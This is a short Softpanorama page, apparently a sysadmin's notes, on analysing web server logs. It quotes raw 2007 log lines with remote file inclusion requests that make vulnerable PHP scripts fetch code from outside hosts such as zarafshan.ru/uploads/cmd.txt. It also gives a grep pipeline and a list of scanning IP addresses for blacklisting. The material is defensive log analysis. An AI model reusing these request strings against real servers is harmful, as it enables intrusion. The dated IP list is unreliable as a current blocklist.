|
Softpanorama |
May the source be with you, but remember the KISS principle ;-)
Softpanorama Search
|
| News | Recommended Links | ||||||
| May | June | July | August | September | November | October | Decemeber |
Recently the number of "strange" access record in web logs jumped and it became interesting to analyze the logs and see what those people are doing. Here is one fragment that I have found manually:
213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/%3Elanguage.shtml/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 383 "-" "libwww-perl/5.79" 213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79" 213.195.77.225 - - [23/Jun/2007:06:00:08 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 364 "-" "libwww-perl/5.79" 213.195.77.225 - - [23/Jun/2007:06:08:12 -0700] "GET /Scripting/Phprama/%3Cwbr%20/%3Ecommand_line_php.shtml/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 393 "-" "libwww-perl/5.79" 213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79" 213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /Scripting/Phprama/%3Cwbr%20/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 366 "-" "libwww-perl/5.79" 66.230.197.170 - - [23/Jun/2007:06:25:53 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.805" 24.117.228.198 - - [23/Jun/2007:06:27:48 -0700] "GET /load_lang.php?_SERWEB[serwebdir]=http://dezzign.ru/echo? HTTP/1.1" 404 168 "-" "libwww-perl/5.803"
One common thing for those record is the usage of libwww.perl. Greping on this string brings us more complete picture reproduced in Zombies bulletin
Extracting IP addresses gives you the first draft of the "blacklist" and that top dozen can be used to block those rogue addresses from accessing your site. To get such a "dirty dozen" you can use a simple pipe which can be made into a function or shell script:
grep 'libwww.perl' $1 | cut -d' ' -f 1 | sort -n | uniq -c | sort -rn | head -12 > $1.dirty
Below are the results of processing of the list from above:
20 83.149.125.174 home.w-sieci.pl 18 80.67.20.21 mayermail.de 12 200.69.222.122 contactar01.gestionarnet.com 11 64.78.163.2 nickentgolf.com 11 62.193.224.166 wpc0230.amenworld.com 10 86.109.161.201 lincl239.ns1.couldix.com 9 87.230.2.113 lvps87-230-2-113.dedicated.hosteurope.de 9 85.214.55.73 mind-creations.net 7 193.192.249.157 6 87.118.96.254 ns.km22206-02.keymachine.de 6 72.55.153.108 ip-72-55-153-108.static.privatedns.com 6 66.147.239.104 host.1sbs.com 6 216.246.52.59 server.dynasoft.com.ph 6 213.195.77.225 225.77.195.213.ibercom.com 5 217.115.197.51 node11.cluster.nxs.nl
Scanning attempts for November, 2009